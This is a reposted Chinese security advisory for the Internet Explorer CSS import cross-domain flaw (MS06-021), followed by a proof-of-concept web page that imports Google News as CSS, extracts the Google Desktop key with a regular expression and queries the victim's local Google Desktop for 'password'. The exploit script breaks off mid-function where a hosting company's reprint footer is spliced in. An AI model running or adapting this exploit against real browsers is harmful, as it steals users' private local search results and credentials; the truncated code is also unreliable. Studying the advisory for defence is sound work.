Microsoft Internet Explorer CSS导入跨域限制绕过漏洞(MS06-021)
发布日期:2005-12-01
更新日期:2006-06-13
受影响系统:
Microsoft Internet Explorer 6.0 SP2描述:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
BUGTRAQ ID: 15660
CVE(CAN) ID: CVE-2005-4089
Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。
Internet Explorer在处理CSS文件时存在漏洞,远程攻击者可能利用此漏洞获取用户敏感信息。
Internet Explorer不能正确的解析CSS文件,导致可能导入无效的CSS文件。这样用户就可能错误的将远程站点的HTML和脚本代码做为CSS文件导入,允许攻击者读取敏感信息。
<*来源:Matan Gillon (matan@hacker.co.il)
链接:http://www.hacker.co.il/security/ie/css_import.html
http://secunia.com/advisories/17564/print/
http://www.microsoft.com/technet/security/Bulletin/MS06-021.mspx
http://www.us-cert.gov/cas/techalerts/TA06-164A.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<head>
<!--
Google Desktop Exploit proof of concept by Matan Gillon
This page is a proof of concept for the CSSXSS attack discussed
at:
http://www.hacker.co.il/security/ie/css_import.html
It shows how using a few simple CSS imports an attacker can
run queries and return the results on a machine that has Google Desktop
v2 installed. This exploit runs only on IE or IE derived browsers.
This is how it's done in a nutshell:
1) Import the google news page as CSS with the query "}{".
2) Extract the GDS key from the import results using a regular expression.
3) Run another CSS import that executes a query for the word "password"
on the local GDS server.
4) Wait 5 seconds for the page to load and show the result.
This proof of concept code is supplied for educational purposes only.
-->
<title>hacker.co.il - Google Desktop Exploit</title>
<style type="text/css">
/*
Import the google news page, the GDS link with the secret key should be
retrieved by this. The query injects curly braces characters so the
link will be visible after the IE CSS parsing.
*/
@import url("http://news.google.com/news?hl=en&ned=us&q=}{");
</style>
</head>
<body>
<h2>Google Desktop Exploit proof of concept</h2>
<p>
Mangled HTML code returned from Google News by a CSS import (note the 127.0.0.1 desktop link):<br>
<textarea rows="20" cols="80" id="gnewsssrc"></textarea>
<p>
Google Desktop key parsed from the code above:<br>
<input type="text" size="50" id="gdskey">
<p>
Results returned from local Google Desktop for the word "password" in raw HTML after CSS parsing:<br>
<textarea rows="20" cols="80" id="gdsresult">Please wait while getting results</textarea>
<p>
The original Google Desktop result page from the local machine:<br>
<iframe width="620" height="300" id="gdspage"></iframe>
<p>
<a href="http://www.hacker.co.il/security/ie/css_import.html">Back to article at hacker.co.il</a>
<script>
// This will show the results of the query on google desktop
function showResults()
{
document.getElementById("gdsresult").innerText = document.styleSheets(0).imports(1).cssText;
}
// Show the CSS parsed HTML source of the Google News import
document.getElementById("gnewsssrc").innerText = document.styleSheets(0).imports(0).cssText;
// A regular expression that parses the key out of the CSS import result
var re = new RegExp("127.0.0.1:4664/search&s=(. ?)\?q");
var reRes = re.exec(document.styleSheets(0).imports(0).cssText);
if (reRes)
{
// Show the parsed key
document.getElementById("gdskey").innerText = reRes[1];
// Combine the valid key with the local server address and add a password query to the URL
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
